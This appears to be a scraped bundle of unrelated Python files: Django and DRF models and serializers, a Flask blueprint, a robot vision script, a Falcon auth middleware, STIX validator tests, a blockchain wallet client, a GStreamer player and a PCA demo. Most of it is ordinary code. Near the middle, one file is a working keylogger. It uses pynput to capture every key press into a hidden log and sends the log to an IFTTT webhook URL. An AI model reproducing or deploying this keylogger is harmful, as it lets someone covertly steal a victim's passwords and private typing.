class Gallery(models.Model):
"""
Contains art pieces
"""
name = models.CharField(max_length=200, default='')
artist = models.ForeignKey('ArtistProfile', on_delete=models.CASCADE)
pub_date = models.DateField('date published', default=timezone.now)
description = models.TextField(max_length=1000, default='')
rating = models.IntegerField(default=0)
def __str__(self):
return self.name
class ArtPiece(models.Model):
title = models.CharField(max_length=200)
pub_date = models.DateField('date published', default=timezone.now)
image = models.ImageField()
artist = models.ForeignKey('ArtistProfile', on_delete=models.CASCADE)
gallery = models.ForeignKey('Gallery', on_delete=models.CASCADE)
stars = models.IntegerField(default=0)
description = models.TextField(max_length=1000, default='')
def __str__(self):
return self.title
|
from flask import Blueprint
assign = Blueprint('assign', __name__)
from . import get_info
from . import assign_partner
|
import cv2
import numpy as np
import math
import ConfigParser
import socket
import sys
"""
looks for blobs. calculates the center of mass (centroid) of the biggest blob. sorts into ball and bumper, then send over tcp
"""
#parse config stuff
config = ConfigParser.RawConfigParser()
config.read("../vision.conf")
exposure = int(config.get('camera','exposure'))
height = int(config.get('camera','height'))
width = int(config.get('camera','width'))
hue_lower = int(config.get('pyballfinder','hue_lower'))
hue_upper = int(config.get('pyballfinder','hue_upper'))
saturation_lower = int(config.get('pyballfinder','saturation_lower'))
saturation_upper = int(config.get('pyballfinder','saturation_upper'))
value_lower = int(config.get('pyballfinder','value_lower'))
value_upper = int(config.get('pyballfinder','value_upper'))
min_contour_area = int(config.get('pyballfinder','min_contour_area'))
area_difference_to_area_for_circle_detect = int(config.get('pyballfinder','area_difference_to_area_for_circle_detect'))
skip_gui = len(sys.argv) >= 2 and sys.argv[1] == "--nogui"
#set up camera
camera = cv2.VideoCapture(0)
camera.set(cv2.cv.CV_CAP_PROP_EXPOSURE,exposure) #time in milliseconds. 5 gives dark image. 100 gives bright image.
camera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH,width)
camera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT,height)
print camera.get(3),camera.get(4)
#set up server
crio_ip = config.get('network_communication','crio_ip')
crio_tcp_loc_coords_port = int(config.get('network_communication','crio_tcp_loc_coords_port'))
send_over_network = (config.get('pyballfinder','send_over_network'))
#set up socket connection - server
if(send_over_network == "True"):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((crio_ip, crio_tcp_loc_coords_port))
"""
does two checks to figure out if it's a circle. First: calculate the area and perimeter of the contour using opencv. Then, calculate the area using the perimeter. Are those two values similar?
Then:find the minimum and maximum radius of the contour. Are they similar?
"""
def is_contour_a_ball(contour,real_area,perimeter,(cx,cy)):
calculated_area=math.pow((perimeter/(2*math.pi)),2)*math.pi
area_difference=abs(real_area-calculated_area)
area_difference_to_area=int(area_difference/real_area*10)
min_radius = 99999999
max_radius = 0
for coord in contour:
dist_from_center = math.sqrt((coord[0][0]-cx)**2+(coord[0][1]-cy)**2)
if dist_from_center < min_radius:
min_radius=dist_from_center
if dist_from_center > max_radius:
max_radius=dist_from_center
if(min_radius<=0):
min_radius=1
check_one = area_difference_to_area<area_difference_to_area_for_circle_detect
check_two = max_radius/min_radius < 3
return check_one and check_two # True if circle
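# Sanity note on the two checks above: for a true circle of radius r the perimeter is
# 2*pi*r, so (perimeter / (2*pi))**2 * pi recovers the measured area (small difference),
# and the min/max radii about the centroid are nearly equal; blobs failing either check
# are treated as bumpers in the main loop below.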
while(1):
_,capture = camera.read()
capture = cv2.flip(capture,1)
# Convert image to HSV plane using cvtColor() function
hsvcapture = cv2.cvtColor(capture,cv2.COLOR_BGR2HSV)
# turn it into a binary image representing yellows
inrangepixels = cv2.inRange(hsvcapture,np.array((hue_lower,saturation_lower,value_lower)),np.array((hue_upper,saturation_upper,value_upper)))#in opencv, HSV is 0-180,0-255,0-255
# Apply erosion and dilation and erosion again to eliminate noise and fill in gaps
dilate = cv2.dilate(inrangepixels,None,iterations = 5)
erode = cv2.erode(dilate,None,iterations = 10)
dilatedagain = cv2.dilate(erode,None,iterations = 5)
# find the contours
tobecontourdetected = dilatedagain.copy()
contours,hierarchy = cv2.findContours(tobecontourdetected,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
message = ""
for contour in contours:
real_area = cv2.contourArea(contour)
if real_area > min_contour_area:
perimeter = cv2.arcLength(contour, True)
M = cv2.moments(contour) #an image moment is the weighted average of a blob
cx,cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
cv2.circle(capture,(cx,cy),5,(0,0,255),-1)
type = ""
if is_contour_a_ball(contour,real_area,perimeter,(cx,cy)):
if(not skip_gui):
cv2.putText(capture,"Ball",(cx,cy),cv2.FONT_HERSHEY_SIMPLEX,3,(0,0,255))
type = "BALL"
else:
cv2.putText(capture,"Bumper",(cx,cy),cv2.FONT_HERSHEY_SIMPLEX,3,(0,0,255))
type = "BUMP"
message+=(type + "," + str(cx) + "," + str(cy) +"," + str(int(real_area)) + ";\n")
if(message and send_over_network == "True"):
s.send(message)
# show our image during different stages of processing
if(not skip_gui):
cv2.imshow('capture',capture)
cv2.imshow('erodedbinary',dilatedagain)
if cv2.waitKey(1) == 27:
break
s.close()
cv2.destroyAllWindows()
camera.release()
|
from falcon import falcon
from core.sys_modules.authentication.UserServices import UserServices
from core.base_resource import BaseResource
from settings.settings import SETTINGS
class AuthenticationMiddleware(object):
"""
Authentication middleware class
"""
URL_WHITE_LIST = [
'/v1/users/logout',
'/v1/users/login',
'/v1/users/register',
'/login',
'/access-denied'
]
EXTENSION_WHITELIST = [
'.css',
'.js',
'.png',
'.svg',
'.jpg',
'.ico'
]
def process_request(self, req, resp):
"""
        Authenticate the incoming request: whitelisted URLs and static-file extensions
        pass straight through; otherwise the 'token' cookie is validated and, on failure,
        JSON clients receive a 401 while browser requests are redirected to /login.

        Args:
            req: the incoming falcon request
            resp: the falcon response being built
        Returns:
            None
"""
if req.method != 'OPTIONS':
if SETTINGS['AUTHENTICATION']['ENABLE_SYS_AUTHENTICATION'] is True:
url = req.relative_uri
is_file = False
for ext in self.EXTENSION_WHITELIST:
if ext in url:
is_file = True
break
if url not in self.URL_WHITE_LIST and not is_file:
content_type = '' if req.content_type is None else req.content_type
accept = '' if req.accept is None else req.accept
cookies = req.cookies
valid = False
if 'token' in cookies:
token = cookies['token']
valid = UserServices.validate(token)
if not valid:
if 'json' in content_type or 'json' in accept:
resp.status = falcon.HTTP_404
resp.content_type = 'application/json'
resp.unset_cookie('token')
raise falcon.HTTPUnauthorized('Access denied', 'in order to continue please log in')
else:
redirect = req.relative_uri
if 'logout' not in redirect and 'access-denied' not in redirect:
resp.set_cookie('redirect', redirect.strip('\"'), max_age=600, path='/', http_only=False)
else:
resp.unset_cookie('redirect')
raise falcon.HTTPTemporaryRedirect('/login')
@falcon.after(BaseResource.conn.close)
def process_resource(self, req, resp, resource, params):
"""
Process resource
:param req:
:param resp:
:param resource:
:param params:
:return:
"""
url = req.relative_uri
if url not in self.URL_WHITE_LIST:
try:
access = getattr(resource, 'group_access')
except AttributeError:
access = []
if len(access) != 0:
token = None if 'token' not in req.cookies else req.cookies['token']
if token is not None and token != '':
data = UserServices.get_data_from_token(token)
payload = {} if 'payload' not in data else data['payload']
if 'permissions' in payload:
permissions = payload['permissions']
has_permissions = False
for permission in permissions:
if permission['group_name'] in access:
has_permissions = True
break
if not has_permissions:
content_type = '' if req.content_type is None else req.content_type
if 'json' in content_type:
BaseResource.conn.close()
raise falcon.HTTPUnauthorized(
"Access denied",
"You don't have sufficient permissions to view this resource")
else:
BaseResource.conn.close()
raise falcon.HTTPTemporaryRedirect('/access-denied')
BaseResource.conn.close()
@falcon.after(BaseResource.conn.close)
def process_response(self, req, resp):
"""
Close the db connection after the request is processed
:param req:
:param resp:
:return:
"""
pass
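# Typical wiring (assumed entry point, not shown here): the middleware is handed to the
# falcon API so every request passes through process_request/process_resource first, e.g.
#     app = falcon.API(middleware=[AuthenticationMiddleware()])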
|
# -*- coding: utf-8 -*-
"""
Created by Huang
Date: 2018/9/5
"""
from rest_framework import serializers
# class GoodsSerializer(serializers.Serializer):
# """
#     Goods list page implemented with a Serializer
# """
# name = serializers.CharField(required=True, max_length=100)
# click_num = serializers.IntegerField(default=0)
# goods_front_image = serializers.ImageField()
from goods.models import Goods, GoodCategory
class CategorySerializer(serializers.ModelSerializer):
"""
    Goods category serializer
"""
class Meta:
model = GoodCategory
fields = '__all__'
class GoodsSerializer(serializers.ModelSerializer):
"""
    Goods serializer
"""
category = CategorySerializer()
class Meta:
model = Goods
fields = '__all__'
class CategorySerializer3(serializers.ModelSerializer):
"""
    Third-level category serializer
"""
class Meta:
model = GoodCategory
fields = '__all__'
class CategorySerializer2(serializers.ModelSerializer):
"""
    Second-level category serializer
"""
sub_cat = CategorySerializer3(many=True)
class Meta:
model = GoodCategory
fields = '__all__'
class CategorySerializer(serializers.ModelSerializer):
"""
    Top-level goods category serializer
"""
    sub_cat = CategorySerializer2(many=True)  # 'many=True' means there can be more than one second-level category
class Meta:
model = GoodCategory
fields = "__all__"
|
import copy
import json
from . import ValidatorTest
from .. import validate_parsed_json, validate_string
VALID_RELATIONSHIP = u"""
{
"type": "relationship",
"id": "relationship--44298a74-ba52-4f0c-87a3-1824e67d7fad",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"created": "2016-04-06T20:06:37.000Z",
"modified": "2016-04-06T20:06:37.000Z",
"source_ref": "indicator--8e2e2d2b-17d4-4cbf-938f-98ee46b3cd3f",
"target_ref": "malware--31b940d4-6f7f-459a-80ea-9c1f17b5891b",
"relationship_type": "indicates"
}
"""
class RelationshipTestCases(ValidatorTest):
valid_relationship = json.loads(VALID_RELATIONSHIP)
def test_wellformed_relationship(self):
results = validate_string(VALID_RELATIONSHIP, self.options)
self.assertTrue(results.is_valid)
def test_relationship_type(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['relationship_type'] = "SOMETHING"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
def test_source_relationship(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "relationship--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
self.assertEqual(len(results.errors), 1)
def test_source_sighting(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "sighting--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
def test_target_bundle(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['target_ref'] = "bundle--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
self.assertEqual(len(results.errors), 1)
def test_target_marking_definition(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['target_ref'] = "marking-definition--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
def test_relationship_types_invalid_type(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "malware--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
relationship['target_ref'] = "campaign--9c1f891b-459a-6f7f-80ea-31b940d417b5"
relationship['relationship_type'] = "mitigates"
results = validate_parsed_json(relationship, self.options)
self.assertEqual(results.is_valid, False)
self.check_ignore(relationship, 'relationship-types')
def test_relationship_types_invalid_source(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "identity--b5437038-eb96-4652-88bc-5f94993b7326"
self.assertFalseWithOptions(relationship)
def test_relationship_types_invalid_target(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['target_ref'] = "report--af0976b2-e8f3-4646-8026-1cf4d0ce4d8a"
self.assertFalseWithOptions(relationship)
def test_relationship_types_valid(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "tool--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
relationship['target_ref'] = "vulnerability--9c1f891b-459a-6f7f-80ea-31b17b5940d4"
relationship['relationship_type'] = "targets"
results = validate_parsed_json(relationship, self.options)
self.assertTrue(results.is_valid)
def test_relationship_types_common(self):
relationship = copy.deepcopy(self.valid_relationship)
relationship['source_ref'] = "malware--31b940d4-6f7f-459a-80ea-9c1f17b5891b"
relationship['target_ref'] = "campaign--9c1f891b-459a-6f7f-80ea-31b940d417b5"
relationship['relationship_type'] = "related-to"
results = validate_parsed_json(relationship, self.options)
self.assertTrue(results.is_valid)
def test_missing_required(self):
relationship = copy.deepcopy(self.valid_relationship)
del relationship['relationship_type']
self.assertFalseWithOptions(relationship)
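# These cases can be run with pytest alongside the rest of the validator test
# suite, e.g. (the invocation below assumes the project's usual layout):
#
#   pytest -k RelationshipTestCases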
|
#!/usr/bin/env python3
from pynput.keyboard import Listener
import socket
import os
import pwd
import requests
'''
The log file location varies with the user running the software,
so the lines below harvest the account information at import time
and use it during runtime.
'''
userdata = pwd.getpwuid(os.getuid())
# returns a list-like record with some interesting account data
username = userdata[0]
logFile = userdata[5] + '/log'
key = "Your IFTTT Webhooks' key here"
event = "The event name you've created"
url = "https://maker.ifttt.com/trigger/" + event + "/with/key/" + key
#Debug. Did you do this step properly?
#print(url)
def request():
with open(logFile, "r+") as file:
log = file.read()
if len(log) > 100:
payload = {"value1":log}
r = requests.post(url, data=payload)
if r.status_code == 200:
file.truncate(0)
else:
print(r.status_code)
def writeLog(key):
keydata = str(key)
'''
writeLog() is the "main" function.
It receives each key press from the listener and appends it to a temporary log file.
If you want, you can edit the program to erase this log file in case of an unexpected exit. Good luck :)
The dictionary below translates some of the key presses returned by the listener.
'''
translate_keys = {
"Key.space": " ",
"Key.shift_r": "[SHIFT]",
"Key.shift_l": "[SHIFT]",
"Key.enter": "\n",
"Key.alt": "[ALT]",
"Key.esc": "[ESC]",
"Key.cmd": "[CMD]",
"Key.caps_lock": "[CAPS]",
"Key.backspace": "[BACKSPACE]",
"Key.tab": "[TAB]",
"Key.ctrlc":"[CTRL+C]"
}
'''
Strip the quotes that str() puts around every single character.
'''
keydata = keydata.replace("'", "")
#Checks if any translation is needed
for key in translate_keys:
keydata = keydata.replace(key, translate_keys[key])
#Opens file in append mode
with open(logFile, "a") as file:
file.write(keydata)
request()
#This is the event listener which checks the keystrokes and calls writeLog() for each key press
while True:
with Listener(on_press=writeLog) as l:
l.join()
|
"""
Tfchain Client
"""
from Jumpscale import j
from json import dumps
from JumpscaleLib.clients.blockchain.tfchain.errors import InvalidTfchainNetwork, NoExplorerNetworkAddresses
from JumpscaleLib.clients.blockchain.tfchain.TfchainNetwork import TfchainNetwork
from JumpscaleLib.clients.blockchain.rivine.RivineWallet import RivineWallet
TEMPLATE = """
network = "{}"
seed_ = ""
explorers = {}
password = ""
nr_keys_per_seed = 1
""".format(
TfchainNetwork.STANDARD.name.lower(),
dumps(TfchainNetwork.STANDARD.official_explorers()))
# JSConfigBase = j.tools.configmanager.JSBaseClassConfig
JSConfigBase = j.tools.configmanager.base_class_config
class TfchainClient(JSConfigBase):
"""
Tfchain client object
"""
def __init__(self, instance, data=None, parent=None, interactive=False):
"""
Initializes a new Tfchain Client
"""
if not data:
data = {}
JSConfigBase.__init__(self, instance, data=data, parent=parent,
template=TEMPLATE, interactive=interactive)
self._wallet = None
@property
def wallet(self):
if self._wallet is None:
client = j.clients.tfchain.get(self.instance, create=False)
# Load the correct config params specific to the network
network = TfchainNetwork(self.config.data['network'])
if not isinstance(network, TfchainNetwork):
raise InvalidTfchainNetwork("invalid tfchain network specified")
minerfee = network.minimum_minerfee()
explorers = self.config.data['explorers']
if not explorers:
explorers = network.official_explorers()
if not explorers:
raise NoExplorerNetworkAddresses(
"network {} has no official explorer networks and none were specified by callee".format(network.name.lower()))
# Load a wallet from a given seed. If no seed is given,
# generate a new one
seed = self.config.data['seed_']
if seed == "":
seed = self.generate_seed()
# Save the seed in the config
data = dict(self.config.data)
data['seed_'] = seed
cl = j.clients.tfchain.get(instance=self.instance,
data=data,
create=True,
interactive=False)
cl.config.save()
# make sure to set the seed in the current object.
# if not, we'd have a random non persistent seed until
# the first reload
self.config.data['seed_'] = seed
self._wallet = RivineWallet(seed=seed,
bc_networks=explorers,
bc_network_password=self.config.data['password'],
nr_keys_per_seed=self.config.data['nr_keys_per_seed'],
minerfee=minerfee,
client=client)
return self._wallet
def generate_seed(self):
"""
Generate a new seed
"""
return j.data.encryption.mnemonic.generate(strength=256)
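# A minimal usage sketch (the instance name "main" is an assumption, not part
# of this module). The client is normally obtained through the Jumpscale
# config manager, and the wallet is built lazily on first access.
#
#   client = j.clients.tfchain.get("main")
#   wallet = client.wallet  # RivineWallet bound to the configured explorers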
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 14 17:38:42 2015
@author: pavel
"""
import os
import time
import threading
from sys import argv
import gi
gi.require_version('Gst', '1.0')
from gi.repository import GObject, Gst
from urllib.parse import urljoin
from urllib.request import pathname2url
GObject.threads_init()
Gst.init(None)
class Player:
def __init__(self, volume = 1.0, callback_on_stop=None, callback_on_progress=None):
""" constructor
volume[optional] : initial player volume
callback_on_stop[optional] : function(file_url) to be called
after record was stopped
callback_on_progress[optional] : function(file_url, file_duration, position_so_far)
to be called at each position update """
self.active = False
self.volume = volume
self.callback_on_stop = callback_on_stop
self.callback_on_progress = callback_on_progress
self.track = None
self.track_duration = None
self.player = Gst.ElementFactory.make('playbin', 'player')
self.bus = self.player.get_bus()
self.bus.add_signal_watch()
self.watch_id = self.bus.connect("message", self.message_handler)
self.set_volume(volume)
#self.control = Gst.Controller(src, "freq", "volume")
#GObject.MainLoop().run()
self.auto_polling_enabled = False
def start_polling(self, polling_interval=1, forcedCheck = False):
""" function to be called every polling_interval seconds if player is playing
functions should takes as parameters file_url, track_length, current_position"""
def poll():
while self.auto_polling_enabled:
time.sleep(polling_interval)
if self.track is not None \
and self.is_active(forcedCheck) \
and self.is_playing():
self.on_progress_update()
if not self.auto_polling_enabled:
self.auto_polling_enabled = True
self.selfcheck_thread = threading.Thread(target=poll)
self.selfcheck_thread.daemon = True
self.selfcheck_thread.start()
return True
return False
def stop_polling(self):
self.auto_polling_enabled = False
def close(self):
""" destructor """
print("destruction...")
self.stop_polling()
self.stop()
#if self.bus is not None:
self.bus.remove_signal_watch()
self.bus.disconnect(self.watch_id)
def _path2url(self, path):
return urljoin('file:', pathname2url(os.path.abspath(path)))
def load_track(self, path):
""" add track to player
path : path to the file
will return url to the file"""
if self.track is not None:
self.stop()
self.track = self._path2url(path)
self.player.set_property('uri', self.track)
return self.track
def stop(self):
if self.active:
print(self.track + " stopped")
self.player.set_state(Gst.State.NULL)
self.active = False
if self.callback_on_stop is not None:
self.callback_on_stop(self.track)
self.track_duration = None
def play(self):
""" start playing """
print(self.track + " playing")
self.player.set_state(Gst.State.PLAYING)
self.active = True
def pause(self):
""" pause """
print(self.track + " paused")
self.player.set_state(Gst.State.PAUSED)
def resume(self):
""" resume playing """
print(self.track + " resumed")
self.player.set_state(Gst.State.PLAYING)
def set_volume(self, volume):
""" set track volume to value in [0.0 1.0]"""
self.volume = volume
self.player.set_property('volume', self.volume)
def get_volume(self):
""" get track volume """
return self.volume
def mute(self):
""" """
self.player.set_property('volume', 0.0)
def unmute(self):
""" """
self.player.set_property('volume', self.volume)
def get_duration(self):
""" get duration in seconds"""
if self.track_duration is None:
self.track_duration = self.player.query_duration(Gst.Format.TIME)[1] /Gst.SECOND
return self.track_duration
def get_position(self):
""" get position in seconds"""
return self.player.query_position(Gst.Format.TIME)[1] /Gst.SECOND
def set_position(self, position):
""" set current position to position in seconds"""
self.player.seek_simple(Gst.Format.TIME, Gst.SeekFlags.FLUSH
| Gst.SeekFlags.KEY_UNIT, position * Gst.SECOND)
def _get_state(self):
status, state, pending = self.player.get_state(Gst.CLOCK_TIME_NONE)
#print status, state, pending
return state
def is_active(self, forcedCheck = True):
""" return true if is playing or on pause"""
if forcedCheck:
self.check_messages()
return self.active
def is_paused(self):
return self._get_state() == Gst.State.PAUSED
def is_playing(self):
return self._get_state() == Gst.State.PLAYING
def message_handler(self, bus, message):
# Capture the messages on the bus and
# set the appropriate flag.
if message is None: return
msgType = message.type
print(msgType, message)
if msgType == Gst.MessageType.ERROR:
self.stop()
print("Unable to play audio. Error: ", message.parse_error())
elif msgType == Gst.MessageType.EOS:
self.stop()
def check_messages(self):
""" manually check messages"""
types = Gst.MessageType.EOS | Gst.MessageType.ERROR
self.message_handler(self.bus, self.bus.pop_filtered(types))
def on_progress_update(self):
self.callback_on_progress(self.track, self.get_duration(), self.get_position())
def play(f_names):
f_names.append("./test.mp3")
def callback_on_stop(file_url):
print("end of " + file_url)
def callback_on_progress(file_url, dur, pos):
print(str(pos)+' / ' + str(dur))
pl = Player(volume = 0.2, callback_on_stop=callback_on_stop)
#pl.start_polling(forcedCheck=True)
for f_name in f_names:
if os.path.isfile(f_name):
print("Loading", pl.load_track(f_name))
pl.play()
time.sleep(1)
print('Duration : '+ str(pl.get_duration()))
while pl.is_active():
print('Position : '+ str(pl.get_position()), end='\r')
time.sleep(1)
pl.stop()
print()
pl.close()
if __name__ == "__main__":
play(argv[1:])
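# A progress-polling variant of the demo above (a sketch; the polling interval
# is an assumption):
#
#   pl = Player(volume=0.2, callback_on_stop=callback_on_stop,
#               callback_on_progress=callback_on_progress)
#   pl.load_track("./test.mp3")
#   pl.start_polling(polling_interval=1)
#   pl.play()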
|
from Code.pca_variance import demo_variance_explained_curve
# Run the variance-explained-curve demo
demo_variance_explained_curve()
|